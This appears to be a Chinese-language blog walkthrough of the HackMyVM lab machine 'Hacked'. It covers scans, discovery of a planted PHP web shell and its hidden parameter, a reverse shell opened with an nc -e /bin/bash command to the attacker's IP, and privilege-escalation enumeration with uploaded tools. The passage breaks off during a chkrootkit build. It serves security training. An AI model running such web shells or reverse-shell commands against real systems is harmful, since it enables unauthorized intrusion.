{"id":852,"date":"2025-06-11T14:57:58","date_gmt":"2025-06-11T06:57:58","guid":{"rendered":"http:\/\/162.14.82.114\/?p=852"},"modified":"2025-06-11T14:57:58","modified_gmt":"2025-06-11T06:57:58","slug":"hmv-_-hacked","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/852\/06\/11\/2025\/","title":{"rendered":"hmv[-_-] Hacked"},"content":{"rendered":"<h1>Hacked<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457048.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457048.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250610234439472\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457050.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457050.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250611130905340\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ rustscan -a $IP -- -sCV            \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nRustScan: allowing you to send UDP packets into the void 1200x faster than NMAP\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 8d:75:44:05:5f:f8:4f:ac:a1:33:fa:84:03:db:6f:94 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYrv7gikvr+o8WMLYqSUw77la9iJ\/Vh8JmfXLE1PZ7vnyC8sQ75Yt6kRDNfeOhSj00Q9kA8XJ2VY3po3LvSObFyypyc4do1bEkX8aNYAFo5ZC4FUVztx\/ZPEj3D\/klNdfFsHqwvtMgU+3yawarWNgGBzr8XCJHBDcYT0UHMXNLs+6XqimG7bgjskxn\/x0cgTvfYA+TNQ7cPu0\/NW6H5gu1YB9CELPevA3RQLEoOJOrF3l4KNz0EHFP4jQJNsZ3K82MgAexNeB+Gr7hvc4iqlBx4q0vGfFJ5fK7kJSt2hx1RLODMMHSheOgQx1RPvyUybQD6pXFumAoOZlRnr6qxOJj\n|   256 5a:b6:c6:9d:a9:15:42:74:4c:7a:f9:dd:67:ae:75:0e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNWwAdezPisoVst3eOz+eNi3JBbvq7ZNeCeW\/OIisUio3XsVhprqhlsNf36LR7GReKc+ZTgjasDS7hdw57sKYGU=\n|   256 05:97:3c:74:bd:cf:8d:80:87:05:26:64:7f:d9:3d:c3 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAUDlvoPM8ZhiXLdc0LYoa1rdevWDiGRpyDMzFQ9Uq\/g\n80\/tcp open  http    syn-ack ttl 64 nginx 1.14.2\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\nMAC Address: 08:00:27:48:82:DB (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -x php html txt\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.10.100\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt\n \ud83d\udc4c  Status Codes          \u2502 All Status Codes!\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.11.0\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [php, html, txt]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        1l        3w       16c http:\/\/192.168.10.100\/\n200      GET        1l        3w       16c http:\/\/192.168.10.100\/index.html\n200      GET        1l        1w       16c http:\/\/192.168.10.100\/robots.txt\n[####################] - 59s   120000\/120000  0s      found:3       errors:0      \n[####################] - 58s   120000\/120000  2054\/s  http:\/\/192.168.10.100\/<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ curl -s http:\/\/$IP\/index.html\nHACKED BY h4x0r\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt\n\/secretnote.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ curl -s http:\/\/$IP\/secretnote.txt\n[X] Enumeration\n[X] Exploitation\n[X] Privesc\n[X] Maintaining Access.\n |__&gt; Webshell installed.\n |__&gt; Root shell created.\n\n-h4x0r<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u65e0\u540e\u95e8\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ ffuf -u http:\/\/$IP\/FUZZ -w \/usr\/share\/seclists\/Web-Shells\/backdoor_list.txt 2&gt;\/dev\/null\nsimple-backdoor.php     [Status: 302, Size: 62, Words: 10, Lines: 2, Duration: 60ms]<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e2a\u73b0\u6210\u7684\u540e\u95e8\uff0c\u5c1d\u8bd5<code>fuzz<\/code>\u4e00\u4e0b\u53c2\u6570\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ curl -s http:\/\/$IP\/simple-backdoor.php\nI modified this webshell to only execute my secret parameter.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ wfuzz -u &quot;http:\/\/$IP\/simple-backdoor.php?FUZZ=whoami&quot; -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt --hw 10 2&gt;\/dev\/null\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.10.100\/simple-backdoor.php?FUZZ=whoami\nTotal requests: 220560\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000005155:   302        1 L      11 W       70 Ch       &quot;secret&quot;                                                                                                                    \n^C\nTotal time: 0\nProcessed Requests: 6297\nFiltered Requests: 6296\nRequests\/sec.: 0<\/code><\/pre>\n<p>\u627e\u5230\u53c2\u6570\uff0c\u5c1d\u8bd5\u6267\u884c\u76f8\u5173\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP\/simple-backdoor.php?secret=nc+-e+\/bin\/bash+192.168.10.106+1234&quot;\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457051.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457051.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250611132857263\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@hacked:\/var\/www\/html$ ls -la\ntotal 24\ndrwxr-xr-x 2 root root 4096 Nov 15  2020 .\ndrwxr-xr-x 3 root root 4096 Nov 15  2020 ..\n-rw-r--r-- 1 root root   16 Nov 15  2020 index.html\n-rw-r--r-- 1 root root   16 Nov 15  2020 robots.txt\n-rw-r--r-- 1 root root  129 Nov 15  2020 secretnote.txt\n-rw-r--r-- 1 root root  142 Nov 15  2020 simple-backdoor.php\n(remote) www-data@hacked:\/var\/www\/html$ cat simple-backdoor.php \nI modified this webshell to only execute my secret parameter.\n&lt;?php\n$command = $_GET[&#039;secret&#039;];\necho exec($command);\nheader(&#039;Location:\/&#039;);\n?&gt;\n(remote) www-data@hacked:\/var\/www\/html$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nh4x0r\nsshd\n(remote) www-data@hacked:\/var\/www\/html$ ls -la \/home\ntotal 12\ndrwxr-xr-x  3 root  root  4096 Nov 15  2020 .\ndrwxr-xr-x 18 root  root  4096 Nov 15  2020 ..\ndrwxr-xr-x  2 h4x0r h4x0r 4096 Nov 15  2020 h4x0r\n(remote) www-data@hacked:\/var\/www\/html$ cd \/home\/h4x0r\/\n(remote) www-data@hacked:\/home\/h4x0r$ ls -la\ntotal 32\ndrwxr-xr-x 2 h4x0r h4x0r 4096 Nov 15  2020 .\ndrwxr-xr-x 3 root  root  4096 Nov 15  2020 ..\n-rw------- 1 h4x0r h4x0r   52 Nov 15  2020 .Xauthority\n-rw-r--r-- 1 h4x0r h4x0r  220 Nov 15  2020 .bash_logout\n-rw-r--r-- 1 h4x0r h4x0r 3526 Nov 15  2020 .bashrc\n-rw-r--r-- 1 h4x0r h4x0r  807 Nov 15  2020 .profile\n-rwxr-xr-x 1 h4x0r h4x0r 1920 Nov 15  2020 flag.sh\n-rw------- 1 h4x0r h4x0r   19 Nov 15  2020 user.txt\n(remote) www-data@hacked:\/home\/h4x0r$ cat flag.sh \n#!\/bin\/bash\necho &#039;\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m&#039;                                               \n\necho &quot;-------------------------&quot;\necho &quot;\\nPWNED HOST: $(hostname)&quot;\necho &quot;\\nPWNED DATE: $(date)&quot;\necho &quot;\\nWHOAMI: $(id)&quot;\necho &quot;\\nFLAG: $(cat root.txt 2&gt;\/dev\/null || cat user.txt 2&gt;\/dev\/null || echo &quot;Keep trying.&quot;)&quot;\necho &quot;\\n------------------------&quot;\n(remote) www-data@hacked:\/home\/h4x0r$ .\/flag.sh \n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: hacked\n\\nPWNED DATE: Wed Jun 11 01:30:16 EDT 2025\n\\nWHOAMI: uid=33(www-data) gid=33(www-data) groups=33(www-data)\n\\nFLAG: Keep trying.\n\\n------------------------\n\n(remote) www-data@hacked:\/home\/h4x0r$ sudo -l\nbash: sudo: command not found\n(remote) www-data@hacked:\/home\/h4x0r$ getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\n(remote) www-data@hacked:\/home\/h4x0r$ find \/ -perm -u=s 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n(remote) www-data@hacked:\/home\/h4x0r$ cd ~\n(remote) www-data@hacked:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Nov 15  2020 .\ndrwxr-xr-x 12 root root 4096 Nov 15  2020 ..\ndrwxr-xr-x  2 root root 4096 Nov 15  2020 html<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e0a\u4f20<code>linpeas.sh<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@hacked:\/var\/www$ cd \/tmp\n(remote) www-data@hacked:\/tmp$ \n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 954.4\/954.4 KB \u2022 ? \u2022 0:00:00[01:51:01] uploaded 954.44KiB in 1.09 seconds                                                                                                                                    upload.py:76\n(local) pwncat$                                                                                                                                                                              \n(remote) www-data@hacked:\/tmp$ ls -la\ntotal 968\ndrwxrwxrwt  8 root     root       4096 Jun 11 01:51 .\ndrwxr-xr-x 18 root     root       4096 Nov 15  2020 ..\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .ICE-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .Test-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .X11-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .XIM-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .font-unix\nsrwxrwxrwx  1 root     root          0 Jun 11 01:00 .hacked\n-rw-r--r--  1 www-data www-data 954437 Jun 11 01:51 linpeas.sh\ndrwx------  3 root     root       4096 Jun 11 00:59 systemd-private-7499b0c19ea84d80a472070e679c956f-systemd-timesyncd.service-4SNEA4\n(remote) www-data@hacked:\/tmp$ chmod +x *\nchmod: changing permissions of &#039;systemd-private-7499b0c19ea84d80a472070e679c956f-systemd-timesyncd.service-4SNEA4&#039;: Operation not permitted<\/code><\/pre>\n<p>\u5999\u624b\u5076\u5f97\u4e4b\uff0c\u53d1\u73b0<code>\/tmp\/.hacked<\/code>\uff0c\u6ce8\u610f\u5230\u5176\u6743\u9650\u5f88\u9ad8\u4e3asuid\u6743\u9650\uff0c\u770b\u4e00\u4e0b\u662f\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@hacked:\/tmp$ file .hacked\n.hacked: socket<\/code><\/pre>\n<p>\u4e0d\u7ba1\u4ed6\uff0c\u7ee7\u7eed\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u4f46\u662f\u5e76\u672a\u53d1\u73b0\u6709\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457052.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457052.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250611140508966\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6709\u70b9\u5947\u602a\uff0c\u524d\u9762\u63d0\u5230\u4e86<code>Root shell created.<\/code>\uff0c\u8bf4\u660e\u8fd9\u4e2a\u673a\u5b50\u6709\u53ef\u80fd\u5df2\u7ecf\u88ab<code>getroot<\/code>\u4e86\u7684\uff0c\u6392\u67e5\u4e00\u4e0b\u540e\u95e8\uff0c\u4f46\u662f\u6ca1\u6709\u6392\u67e5\u5230\uff0c\u4e0a\u4f20<code>chkrootkit<\/code>\u68c0\u67e5\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u5185\u6838\u7ea7\u522b\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">(local) pwncat$ upload chkrootkit.tar.gz\n.\/chkrootkit.tar.gz \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 43.0\/43.0 KB \u2022 ? \u2022 0:00:00[02:33:29] uploaded 42.96KiB in 0.28 seconds                                                                                                                                     upload.py:76\n(local) pwncat$                                                                                                                                                                              \n(remote) www-data@hacked:\/tmp$ tar -zxvf chkrootkit.tar.gz \nchkrootkit-0.58b\/\nchkrootkit-0.58b\/chkdirs.c\nchkrootkit-0.58b\/chklastlog.c\nchkrootkit-0.58b\/strings.c\nchkrootkit-0.58b\/README\nchkrootkit-0.58b\/ifpromisc.c\nchkrootkit-0.58b\/chkrootkit.lsm\nchkrootkit-0.58b\/Makefile\nchkrootkit-0.58b\/README.chkwtmp\nchkrootkit-0.58b\/chkutmp.c\nchkrootkit-0.58b\/chkrootkit\nchkrootkit-0.58b\/COPYRIGHT\nchkrootkit-0.58b\/check_wtmpx.c\nchkrootkit-0.58b\/ACKNOWLEDGMENTS\nchkrootkit-0.58b\/README.chklastlog\nchkrootkit-0.58b\/chkwtmp.c\nchkrootkit-0.58b\/chkproc.c\n(remote) www-data@hacked:\/tmp$ cd chkrootkit\nbash: cd: chkrootkit: No such file or directory\n(remote) www-data@hacked:\/tmp$ ls -la\ntotal 1176\ndrwxrwxrwt 10 root     root       4096 Jun 11 02:33 .\ndrwxr-xr-x 18 root     root       4096 Nov 15  2020 ..\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .ICE-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .Test-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .X11-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .XIM-unix\ndrwxrwxrwt  2 root     root       4096 Jun 11 00:59 .font-unix\nsrwxrwxrwx  1 root     root          0 Jun 11 01:00 .hacked\ndrwxr-xr-x  2 www-data www-data   4096 Jul  5  2023 chkrootkit-0.58b\n-rw-r--r--  1 www-data www-data  42957 Jun 11 02:33 chkrootkit.tar.gz\n-rwxr-xr-x  1 www-data www-data 954437 Jun 11 01:51 linpeas.sh\n-rw-r--r--  1 www-data www-data 158568 Jun 11 02:23 log\ndrwx------  3 root     root       4096 Jun 11 00:59 systemd-private-7499b0c19ea84d80a472070e679c956f-systemd-timesyncd.service-4SNEA4\ndrwx------  2 www-data www-data   4096 Jun 11 01:54 tmux-33\n(remote) www-data@hacked:\/tmp$ cd chkrootkit-0.58b\n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ make sense\ncc -DHAVE_LASTLOG_H -o chklastlog chklastlog.c\ncc: error trying to exec &#039;cc1&#039;: execvp: No such file or directory\nmake: *** [Makefile:43: chklastlog] Error 1\n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ whereis cc1\ncc1:\n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ find \/usr\/ -name &quot;cc1*&quot;\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/cc1\n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ export PATH=$PATH:\/usr\/lib\/gcc\/x86_64-linux-gnu\/8    \n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ whereis cc1\ncc1: \/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/cc1\n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ make sense\ncc -DHAVE_LASTLOG_H -o chklastlog chklastlog.c\ncc -DHAVE_LASTLOG_H -o chkwtmp chkwtmp.c\ncc -DHAVE_LASTLOG_H   -D_FILE_OFFSET_BITS=64 -o ifpromisc ifpromisc.c\ncc  -o chkproc chkproc.c\ncc  -o chkdirs chkdirs.c\ncc  -o check_wtmpx check_wtmpx.c\ncc -static  -o strings-static strings.c\ncc  -o chkutmp chkutmp.c\n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ ls -la\ntotal 984\ndrwxr-xr-x  2 www-data www-data   4096 Jun 11 02:36 .\ndrwxrwxrwt 10 root     root       4096 Jun 11 02:36 ..\n-r--r--r--  1 www-data www-data   5210 Jun 22  2023 ACKNOWLEDGMENTS\n-r--r--r--  1 www-data www-data   1337 Jun 28  2023 COPYRIGHT\n-r--r--r--  1 www-data www-data   1637 Feb 23  2023 Makefile\n-r--r--r--  1 www-data www-data  15638 Jun 28  2023 README\n-r--r--r--  1 www-data www-data   1323 Feb 23  2023 README.chklastlog\n-r--r--r--  1 www-data www-data   1292 Feb 23  2023 README.chkwtmp\n-rwxr-xr-x  1 www-data www-data  14328 Jun 11 02:36 check_wtmpx\n-r--r--r--  1 www-data www-data   7195 Feb 23  2023 check_wtmpx.c\n-rwxr-xr-x  1 www-data www-data  14544 Jun 11 02:36 chkdirs\n-r--r--r--  1 www-data www-data   7376 Feb 23  2023 chkdirs.c\n-rwxr-xr-x  1 www-data www-data  14568 Jun 11 02:36 chklastlog\n-r--r--r--  1 www-data www-data   7833 Jun 28  2023 chklastlog.c\n-rwxr-xr-x  1 www-data www-data  14680 Jun 11 02:36 chkproc\n-r--r--r--  1 www-data www-data  10057 Feb 23  2023 chkproc.c\n-rwxr-xr-x  1 www-data www-data  88420 Jul  5  2023 chkrootkit\n-r--r--r--  1 www-data www-data    582 Jun 28  2023 chkrootkit.lsm\n-rwxr-xr-x  1 www-data www-data  14536 Jun 11 02:36 chkutmp\n-r--r--r--  1 www-data www-data   5965 Feb 23  2023 chkutmp.c\n-rwxr-xr-x  1 www-data www-data  14488 Jun 11 02:36 chkwtmp\n-r--r--r--  1 www-data www-data   2283 Jun 28  2023 chkwtmp.c\n-rwxr-xr-x  1 www-data www-data  14640 Jun 11 